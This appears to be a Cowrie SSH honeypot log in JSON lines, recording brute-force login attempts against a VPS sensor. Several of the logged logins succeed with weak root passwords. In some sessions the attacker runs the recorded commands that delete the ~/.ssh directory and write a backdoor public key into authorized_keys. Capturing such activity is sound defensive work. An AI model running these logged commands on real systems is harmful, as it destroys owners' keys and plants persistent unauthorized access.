{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:41.338205Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd12345!","message":"login attempt [root/Abcd12345!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:42.038594Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:42.447498Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:42.448234Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:42.449517Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:42.634617Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:43.005540Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:28:43.006220Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:28:43.187875Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:43.188788Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":47398,"dst_ip":"1.2.3.4","dst_port":22,"session":"3577dc26b43f","protocol":"ssh","message":"New connection: 24.108.102.132:47398 (1.2.3.4:22) [session: 3577dc26b43f]","sensor":"my-vps","timestamp":"2025-08-26T00:28:43.323394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:43.334254Z","src_ip":"24.108.102.132","session":"3577dc26b43f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:43.502828Z","src_ip":"24.108.102.132","session":"3577dc26b43f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:28:44.173084Z","src_ip":"24.108.102.132","session":"3577dc26b43f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:45.346196Z","src_ip":"24.108.102.132","session":"3577dc26b43f"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":35236,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8521f79069c","protocol":"ssh","message":"New connection: 24.108.102.132:35236 (1.2.3.4:22) [session: f8521f79069c]","sensor":"my-vps","timestamp":"2025-08-26T00:28:45.496484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:45.501937Z","src_ip":"24.108.102.132","session":"f8521f79069c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:45.670008Z","src_ip":"24.108.102.132","session":"f8521f79069c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:46.351928Z","src_ip":"24.108.102.132","session":"f8521f79069c"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:46.528801Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:46.530380Z","src_ip":"24.108.102.132","session":"f8521f79069c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49618,"dst_ip":"1.2.3.4","dst_port":22,"session":"b257be2cacca","protocol":"ssh","message":"New connection: 217.72.205.35:49618 (1.2.3.4:22) [session: b257be2cacca]","sensor":"my-vps","timestamp":"2025-08-26T00:29:17.220353Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:17.222296Z","src_ip":"217.72.205.35","session":"b257be2cacca"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":33514,"dst_ip":"1.2.3.4","dst_port":22,"session":"56fd646e8850","protocol":"ssh","message":"New connection: 45.159.112.103:33514 (1.2.3.4:22) [session: 56fd646e8850]","sensor":"my-vps","timestamp":"2025-08-26T00:29:24.797082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:29:24.797783Z","src_ip":"45.159.112.103","session":"56fd646e8850"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:29:24.901630Z","src_ip":"45.159.112.103","session":"56fd646e8850"}
{"eventid":"cowrie.login.failed","username":"leo","password":"leo","message":"login attempt [leo/leo] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:25.356503Z","src_ip":"45.159.112.103","session":"56fd646e8850"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:26.462068Z","src_ip":"45.159.112.103","session":"56fd646e8850"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":33598,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc5e52681cf8","protocol":"ssh","message":"New connection: 36.89.28.139:33598 (1.2.3.4:22) [session: fc5e52681cf8]","sensor":"my-vps","timestamp":"2025-08-26T00:29:32.192408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:29:32.194507Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:29:32.369365Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwert789","message":"login attempt [root/Qwert789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:29:33.634609Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:29:34.486343Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:29:34.487076Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:29:34.488222Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:34.663638Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:29:35.047179Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:29:35.047955Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:29:35.224595Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:35.225443Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":45174,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed5191334db1","protocol":"ssh","message":"New connection: 36.89.28.139:45174 (1.2.3.4:22) [session: ed5191334db1]","sensor":"my-vps","timestamp":"2025-08-26T00:29:35.398162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:29:35.399086Z","src_ip":"36.89.28.139","session":"ed5191334db1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:29:35.573888Z","src_ip":"36.89.28.139","session":"ed5191334db1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:36.315277Z","src_ip":"36.89.28.139","session":"ed5191334db1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:37.493524Z","src_ip":"36.89.28.139","session":"ed5191334db1"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":45176,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6eeedf3ca75","protocol":"ssh","message":"New connection: 36.89.28.139:45176 (1.2.3.4:22) [session: a6eeedf3ca75]","sensor":"my-vps","timestamp":"2025-08-26T00:29:37.675503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:29:37.676521Z","src_ip":"36.89.28.139","session":"a6eeedf3ca75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:29:37.858516Z","src_ip":"36.89.28.139","session":"a6eeedf3ca75"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:29:38.623752Z","src_ip":"36.89.28.139","session":"a6eeedf3ca75"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:38.806519Z","src_ip":"36.89.28.139","session":"fc5e52681cf8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:38.807829Z","src_ip":"36.89.28.139","session":"a6eeedf3ca75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56280,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad199c236992","protocol":"ssh","message":"New connection: 212.227.125.160:56280 (1.2.3.4:22) [session: ad199c236992]","sensor":"my-vps","timestamp":"2025-08-26T00:29:39.672617Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:39.733795Z","src_ip":"212.227.125.160","session":"ad199c236992"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":56268,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5110e4bfe2e","protocol":"ssh","message":"New connection: 24.108.102.132:56268 (1.2.3.4:22) [session: d5110e4bfe2e]","sensor":"my-vps","timestamp":"2025-08-26T00:29:42.170996Z"}
